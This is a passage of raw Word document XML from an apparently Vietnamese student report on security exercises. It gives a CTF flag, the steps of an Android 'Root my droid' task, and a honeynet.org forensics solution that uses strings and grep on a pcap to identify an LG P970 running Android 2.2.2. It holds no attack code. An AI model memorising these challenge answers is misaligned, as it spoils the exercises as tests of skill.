            <wp:docPr id="699" name="Picture 699" descr="https://lh6.googleusercontent.com/3wFuJTVYtCQrB2bIpKhso4XDogMKrThRvTIpltjTUcp_57k8has8jDjTUUZUPtEOIDJOix284bW0uxQsFfbtHwgkS2d7OnjYHbTXhVPjeOOm34jc5fSAA2S8weZD8lih8dbSJmSJ-FBwQtv5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3wFuJTVYtCQrB2bIpKhso4XDogMKrThRvTIpltjTUcp_57k8has8jDjTUUZUPtEOIDJOix284bW0uxQsFfbtHwgkS2d7OnjYHbTXhVPjeOOm34jc5fSAA2S8weZD8lih8dbSJmSJ-FBwQtv57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29050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E2A0CF" w14:textId="77777777" w:rsidR="00861030" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="00861030">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D52748" w14:textId="558F6ECC" w:rsidR="00861030" w:rsidRDefault="00861030" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Flag :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>BullShitR4ns0mW4re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A7786" w14:textId="12E853B5" w:rsidR="00224FC8" w:rsidRDefault="00224FC8" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DFFC53" w14:textId="77777777" w:rsidR="00224FC8" w:rsidRPr="00447E87" w:rsidRDefault="00224FC8" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32363B88" w14:textId="77777777" w:rsidR="00861030" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A5BC23" w14:textId="1A5E0CE6" w:rsidR="00EE1D6A" w:rsidRPr="00447E87" w:rsidRDefault="00EE1D6A" w:rsidP="00EE1D6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc533387041"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.Bài tập Root my droid.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="25218935" w14:textId="77777777" w:rsidR="00E64FB2" w:rsidRPr="00447E87" w:rsidRDefault="00E64FB2" w:rsidP="00E64FB2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E727CC5" w14:textId="0144F892" w:rsidR="00480ECA" w:rsidRPr="00A1723B" w:rsidRDefault="00480ECA" w:rsidP="00480ECA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Tiến hành cài đặt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>root-me1.apk” lên trình giả lập android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E009FA0" w14:textId="19241454" w:rsidR="00480ECA" w:rsidRPr="00A1723B" w:rsidRDefault="00480ECA" w:rsidP="00480ECA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Chạy ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182CA60C" w14:textId="15622531" w:rsidR="00480ECA" w:rsidRPr="00A1723B" w:rsidRDefault="00480ECA" w:rsidP="00480ECA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Mở tin nhắn và nhận mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713974EE" w14:textId="08338431" w:rsidR="00480ECA" w:rsidRPr="00447E87" w:rsidRDefault="00480ECA" w:rsidP="00480ECA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FBF96FC" wp14:editId="0409C07F">
            <wp:extent cx="3322955" cy="808074"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="700" name="Picture 700" descr="https://lh5.googleusercontent.com/LN595G-CF_xgYY39heogROCz8dtwjgD0mCCfP9VACCKJ5wx_o2QlDr2YZ8-tH2ZIM4sFx2sI5xsRL95biuWDAZDVlqc-i2anQ81dZVtJgCTT8Ua_LDcVr0VWobQsp49PTWKQO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LN595G-CF_xgYY39heogROCz8dtwjgD0mCCfP9VACCKJ5wx_o2QlDr2YZ8-tH2ZIM4sFx2sI5xsRL95biuWDAZDVlqc-i2anQ81dZVtJgCTT8Ua_LDcVr0VWobQsp49PTWKQOb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158" cy="823930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5CBBC4" w14:textId="77777777" w:rsidR="00480ECA" w:rsidRPr="00447E87" w:rsidRDefault="00480ECA" w:rsidP="00480ECA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46205816" w14:textId="6A1567FF" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="00CA241E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc533387042"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Chương 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Bài tập honeynet.org</w:t>
      </w:r>
      <w:r w:rsidR="00392A5B" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="00FE35D3" w14:textId="723D7B87" w:rsidR="00DB25D2" w:rsidRPr="00447E87" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc533387043"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.Cung cấp nhãn hiệu điện thoại, kiểu máy, tên hệ điều hành và phiên bản.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0137FB59" w14:textId="26B7A994" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00A1723B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Sau khi giải nén và nhận được 3 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>file :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> data.bin, sh1sum.txt, traffic.pcap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF14D95" w14:textId="16BCA73F" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00A1723B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Sử dụng câu lệnh String để phân tích file “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>traffic.pcap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">tìm kiếm “User-Agent”: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68DF05" w14:textId="6EE8FC73" w:rsidR="00DB25D2" w:rsidRDefault="00DB25D2" w:rsidP="00A1723B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">“strings </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>traffic.pcap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep User-Agent | sort | uniq”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B29BEC3" w14:textId="77777777" w:rsidR="002D3240" w:rsidRPr="00A1723B" w:rsidRDefault="002D3240" w:rsidP="00A1723B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1389026B" w14:textId="0B8829C4" w:rsidR="00DB25D2" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BB06251" wp14:editId="6969AFF0">
            <wp:extent cx="5943600" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="701" name="Picture 701" descr="https://lh5.googleusercontent.com/f4-I9pBUUmZqczmAzQX-D2OnRYvOFLdhoEYw8wWE_kD9v5yANMOf50RyI6a9NFkK26faK4HdOQjUqnhFCIGHMOcwm9mA2kQp4AT_cQAO1HECHM0IvgbuVEtEVznIsRmxG_T1pD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f4-I9pBUUmZqczmAzQX-D2OnRYvOFLdhoEYw8wWE_kD9v5yANMOf50RyI6a9NFkK26faK4HdOQjUqnhFCIGHMOcwm9mA2kQp4AT_cQAO1HECHM0IvgbuVEtEVznIsRmxG_T1pD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0A3C37C" w14:textId="77777777" w:rsidR="00224FC8" w:rsidRPr="00447E87" w:rsidRDefault="00224FC8" w:rsidP="002F05F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1247B4" w14:textId="67E2F83B" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tìm thấy dòng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247CF3A" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-User-Agent: Android/1.0 (lgp970 FRG83G)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E58DE1" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-User-Agent: Dalvik/1.2.0 (Linux; U; Android 2.2.2; LG-P970 Build/FRG83G)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80D836" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F389E7" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">+Nhãn hiệu điện </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>thoại:LG</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0AFE272E" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>+kiểu máy: P970</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331D565" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00A1723B" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1723B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">+Tên hệ điều hành: Android </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D45AAF" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00DB25D2" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB25D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>+Phiên bản: 2.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94DE9D" w14:textId="77777777" w:rsidR="00DB25D2" w:rsidRPr="00447E87" w:rsidRDefault="00DB25D2" w:rsidP="00DB25D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
